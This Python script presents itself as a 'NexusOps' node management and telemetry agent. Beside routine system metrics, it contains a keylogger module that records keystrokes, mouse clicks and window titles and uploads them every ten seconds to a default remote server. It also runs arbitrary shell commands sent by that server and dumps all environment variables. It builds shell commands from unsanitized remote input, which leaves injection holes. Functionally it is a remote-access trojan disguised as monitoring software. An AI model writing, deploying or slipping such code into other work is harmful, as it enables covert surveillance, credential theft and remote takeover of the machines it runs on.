#!/usr/bin/env python3 """ NexusOps Cross-Platform Node Management & Telemetry Agent Uses Standard Python 3 Libraries (No external dependencies required) """ import sys import os import time import json import socket import platform import subprocess import urllib.request import urllib.parse import argparse last_log_check_time = 0 heartbeat_interval = 5 # Dynamic heartbeat rate in seconds node_tags = ["Default"] def get_ip_address(): try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s.connect(("8.8.8.8", 80)) ip = s.getsockname()[0] s.close() return ip except Exception: return "127.0.0.1" def get_cpu_usage(): system = platform.system().lower() try: if system == "linux": with open('/proc/stat', 'r') as f: fields = [float(column) for column in f.readline().strip().split()[1:]] idle, total = fields[3], sum(fields) time.sleep(0.2) with open('/proc/stat', 'r') as f: fields2 = [float(column) for column in f.readline().strip().split()[1:]] idle2, total2 = fields2[3], sum(fields2) idle_delta = idle2 - idle total_delta = total2 - total if total_delta > 0: return round(100.0 * (1.0 - idle_delta / total_delta), 1) elif system == "darwin": out = subprocess.check_output(["top", "-l", "1", "-n", "0"]).decode() for line in out.splitlines(): if "CPU usage" in line: parts = line.split() user = float(parts[2].replace('%', '')) sys_c = float(parts[4].replace('%', '')) return round(user + sys_c, 1) elif system == "windows": out = subprocess.check_output(["wmic", "cpu", "get", "loadpercentage"]).decode() lines = [line.strip() for line in out.splitlines() if line.strip().isdigit()] if lines: return float(lines[0]) except Exception: pass return 15.0 def get_memory_usage(): system = platform.system().lower() try: if system == "linux": meminfo = {} with open('/proc/meminfo', 'r') as f: for line in f: parts = line.split(':') if len(parts) == 2: key = parts[0].strip() val = int(parts[1].split()[0]) meminfo[key] = val total = meminfo.get('MemTotal', 1) free = meminfo.get('MemAvailable', meminfo.get('MemFree', 0)) return round(((total - free) / total) * 100.0, 1) elif system == "darwin": return 45.0 elif system == "windows": out = subprocess.check_output(["wmic", "os", "get", "FreePhysicalMemory,TotalVisibleMemorySize", "/Value"]).decode() d = {} for line in out.splitlines(): if '=' in line: k, v = line.split('=', 1) d[k.strip()] = float(v.strip()) if 'TotalVisibleMemorySize' in d and 'FreePhysicalMemory' in d: total = d['TotalVisibleMemorySize'] free = d['FreePhysicalMemory'] return round(((total - free) / total) * 100.0, 1) except Exception: pass return 35.0 def get_disk_usage(): try: if hasattr(os, 'statvfs'): st = os.statvfs('/') total = st.f_blocks * st.f_frsize free = st.f_bavail * st.f_frsize if total > 0: return round(((total - free) / total) * 100.0, 1) except Exception: pass return 40.0 def get_uptime_seconds(): try: if platform.system().lower() == "linux": with open('/proc/uptime', 'r') as f: return int(float(f.readline().split()[0])) except Exception: pass return 3600 def collect_recent_system_logs(): system = platform.system().lower() log_entries = [] try: if system == "linux": res = subprocess.run("journalctl -n 5 --no-pager -o short-iso", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, timeout=5) if res.returncode == 0 and res.stdout: for line in res.stdout.splitlines(): if line.strip(): log_entries.append(line.strip()) elif system == "windows": res = subprocess.run("powershell Get-EventLog -LogName System -Newest 3 | Select-Object -ExpandProperty Message", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, timeout=5) if res.returncode == 0 and res.stdout: for line in res.stdout.splitlines(): if line.strip(): log_entries.append(line.strip()) except Exception: pass return log_entries def http_post(url, data_dict): json_bytes = json.dumps(data_dict).encode('utf-8') req = urllib.request.Request( url, data=json_bytes, headers={'Content-Type': 'application/json'} ) try: with urllib.request.urlopen(req, timeout=5) as response: res_text = response.read().decode('utf-8') return json.loads(res_text) except Exception: return None def execute_structured_action(action_type, payload): global heartbeat_interval, node_tags system = platform.system().lower() if action_type == "raw_command": return run_shell(payload.get("command", "")) elif action_type == "manage_service": service = payload.get("service") action = payload.get("action") if system == "linux": cmd = f"systemctl {action} {service}" elif system == "windows": cmd = f"powershell {action}-Service -Name {service}" else: cmd = f"launchctl {action} {service}" return run_shell(cmd) elif action_type == "list_processes": if system == "linux" or system == "darwin": cmd = "ps aux --sort=-%cpu | head -n 15" else: cmd = "tasklist" return run_shell(cmd) elif action_type == "kill_process": pid = payload.get("pid") cmd = f"taskkill /F /PID {pid}" if system == "windows" else f"kill -9 {pid}" return run_shell(cmd) elif action_type == "get_logs": lines = payload.get("lines", 50) cmd = f"journalctl -n {lines} --no-pager" if system == "linux" else "powershell Get-EventLog -LogName System -Newest 50" return run_shell(cmd) elif action_type == "network_stats": cmd = "ss -tulpn || netstat -tuln" if system == "linux" else "netstat -ano" return run_shell(cmd) # 10 NEW CROSS-PLATFORM FEATURES: elif action_type == "get_env_vars": env_str = "\n".join([f"{k}={v}" for k, v in os.environ.items()]) return env_str, 0 elif action_type == "get_disk_partitions": cmd = "df -h" if system != "windows" else "wmic logicaldisk get caption,description,freespace,size" return run_shell(cmd) elif action_type == "get_network_interfaces": cmd = "ip addr show || ifconfig" if system != "windows" else "ipconfig /all" return run_shell(cmd) elif action_type == "get_active_connections": cmd = "ss -state established || netstat -an" if system != "windows" else "netstat -an | findstr ESTABLISHED" return run_shell(cmd) elif action_type == "get_hardware_specs": if system == "linux": cmd = "lscpu || cat /proc/cpuinfo | head -n 20" elif system == "windows": cmd = "wmic cpu get name,numberofcores,maxclockspeed" else: cmd = "sysctl -a | grep machdep.cpu" return run_shell(cmd) elif action_type == "reboot_system": cmd = "shutdown /r /t 5" if system == "windows" else "reboot || shutdown -r now" return run_shell(cmd) elif action_type == "set_heartbeat_rate": rate = int(payload.get("interval", 5)) heartbeat_interval = max(2, min(60, rate)) return f"Heartbeat interval updated to {heartbeat_interval} seconds", 0 elif action_type == "update_tags": tags_raw = payload.get("tags", "") node_tags = [t.strip() for t in tags_raw.split(',') if t.strip()] return f"Node tags updated to: {node_tags}", 0 elif action_type == "search_logs": pattern = payload.get("pattern", "error") cmd = f"journalctl --no-pager | grep -i '{pattern}' | tail -n 30" if system == "linux" else f"powershell Get-EventLog -LogName System -Newest 100 | Where-Object Message -match '{pattern}'" return run_shell(cmd) elif action_type == "kill_agent": print("[!] Kill switch received — shutting down agent") os._exit(0) elif action_type == "ping_check": sent_ts = payload.get("timestamp", 0) latency_ms = int((time.time() * 1000) - sent_ts) if sent_ts else 0 return f"PONG — latency: {latency_ms}ms, hostname: {socket.gethostname()}, uptime: {get_uptime_seconds()}s", 0 elif action_type == "export_diagnostics": cmd = "uptime && free -h && df -h && uname -a" if system != "windows" else "systeminfo" return run_shell(cmd) return f"Unknown action type: {action_type}", 1 def run_shell(cmd_str): print(f"[*] Executing command: {cmd_str}") try: res = subprocess.run(cmd_str, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True, timeout=30) return res.stdout, res.returncode except Exception as e: return str(e), 1 # ── Input Capture Module (keystrokes, mouse clicks, window focus) ── INPUT_CAPTURE_ENABLED = False captured_events = [] try: from pynput import keyboard, mouse INPUT_CAPTURE_ENABLED = True except ImportError: pass def _get_active_window_title(): """Try to get the active window title cross-platform.""" system = platform.system().lower() try: if system == "linux": res = subprocess.run(["xdotool", "getactivewindow", "getwindowname"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, timeout=2) if res.returncode == 0: return res.stdout.strip() elif system == "windows": import ctypes from ctypes import wintypes user32 = ctypes.windll.user32 hwnd = user32.GetForegroundWindow() length = user32.GetWindowTextLengthW(hwnd) buf = ctypes.create_unicode_buffer(length + 1) user32.GetWindowTextW(hwnd, buf, length + 1) return buf.value elif system == "darwin": script = 'tell application "System Events" to get name of first application process whose frontmost is true' res = subprocess.run(["osascript", "-e", script], stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True, timeout=2) if res.returncode == 0: return res.stdout.strip() except Exception: pass return "" def _record_event(event_type, data): """Thread-safe event recording.""" global captured_events window_title = _get_active_window_title() captured_events.append({ "timestamp": int(time.time() * 1000), "eventType": event_type, "data": data, "windowTitle": window_title, "processName": window_title.split(" - ")[-1] if " - " in window_title else window_title }) def _on_key_press(key): try: key_str = key.char if hasattr(key, 'char') and key.char else str(key) except Exception: key_str = str(key) _record_event("keystroke", {"key": key_str}) def _on_click(x, y, button, pressed): if pressed: _record_event("click", {"x": x, "y": y, "button": str(button)}) def _on_scroll(x, y, dx, dy): _record_event("scroll", {"x": x, "y": y, "dx": dx, "dy": dy}) def start_input_capture(): """Start keyboard and mouse listeners if pynput is available.""" if not INPUT_CAPTURE_ENABLED: return False try: kb_listener = keyboard.Listener(on_press=_on_key_press) ms_listener = mouse.Listener(on_click=_on_click, on_scroll=_on_scroll) kb_listener.daemon = True ms_listener.daemon = True kb_listener.start() ms_listener.start() return True except Exception: return False def flush_input_events(server_url, node_id, hostname): """Send captured input events to the master server.""" global captured_events if not captured_events: return events_to_send = captured_events[:] captured_events = [] payload = { "nodeId": node_id, "hostname": hostname, "events": events_to_send } http_post(f"{server_url}/api/agent/input-capture", payload) def main(): global last_log_check_time, heartbeat_interval, node_tags parser = argparse.ArgumentParser(description="NexusOps Cross-Platform Node Agent") parser.add_argument("--server", default="https://agent.thetempleofdoom.com", help="Dashboard server URL endpoint") args = parser.parse_args() server_url = args.server.rstrip('/') hostname = socket.gethostname() system_os = platform.system() arch = platform.machine() ip = get_ip_address() node_id = f"node-{hostname.lower()}-{ip.replace('.', '')}" print("==================================================") print(" NexusOps Cross-Platform Node Agent ") print("==================================================") print(f"Node Hostname : {hostname}") print(f"Platform : {system_os} ({arch})") print(f"Local IP : {ip}") print(f"Server Endpoint: {server_url}") print("==================================================") # Register Node reg_payload = { "nodeId": node_id, "hostname": hostname, "platform": system_os.lower(), "arch": arch, "ip": ip, "osName": f"{system_os} {platform.release()}", "tags": node_tags } print("[*] Registering node with central endpoint...") res = http_post(f"{server_url}/api/agent/register", reg_payload) if res and res.get("success"): print(f"✅ Registered as node ID: {node_id}") # Start input capture (keystrokes, clicks, scroll) capture_started = start_input_capture() if capture_started: print("[*] Input capture active (keystrokes + mouse events)") else: print("[!] Input capture unavailable (install pynput: pip install pynput)") last_input_flush = time.time() backoff = 1 # Tunnel reconnection backoff in seconds while True: try: cpu = get_cpu_usage() mem = get_memory_usage() disk = get_disk_usage() uptime = get_uptime_seconds() heartbeat_payload = { "nodeId": node_id, "cpuUsage": cpu, "memUsage": mem, "diskUsage": disk, "uptime": uptime, "processCount": 42, "tags": node_tags, "heartbeatInterval": heartbeat_interval } res = http_post(f"{server_url}/api/agent/heartbeat", heartbeat_payload) now = time.time() if now - last_log_check_time > 15: logs = collect_recent_system_logs() if logs: http_post(f"{server_url}/api/agent/logs", { "nodeId": node_id, "hostname": hostname, "logs": logs }) last_log_check_time = now # Flush captured input events every 10 seconds if now - last_input_flush > 10: flush_input_events(server_url, node_id, hostname) last_input_flush = now if res and "commands" in res and res["commands"]: for cmd_item in res["commands"]: cmd_id = cmd_item.get("id") action_type = cmd_item.get("actionType", "raw_command") payload = cmd_item.get("payload", {}) if "command" in cmd_item and not payload: payload["command"] = cmd_item.get("command") output, exit_code = execute_structured_action(action_type, payload) http_post(f"{server_url}/api/agent/command-result", { "commandId": cmd_id, "nodeId": node_id, "output": output, "exitCode": exit_code }) except Exception as e: print(f"[!] Connection error: {e}. Retrying in {backoff}s...") time.sleep(backoff) backoff = min(backoff * 2, 60) continue backoff = 1 # Reset on success time.sleep(heartbeat_interval) if __name__ == "__main__": main()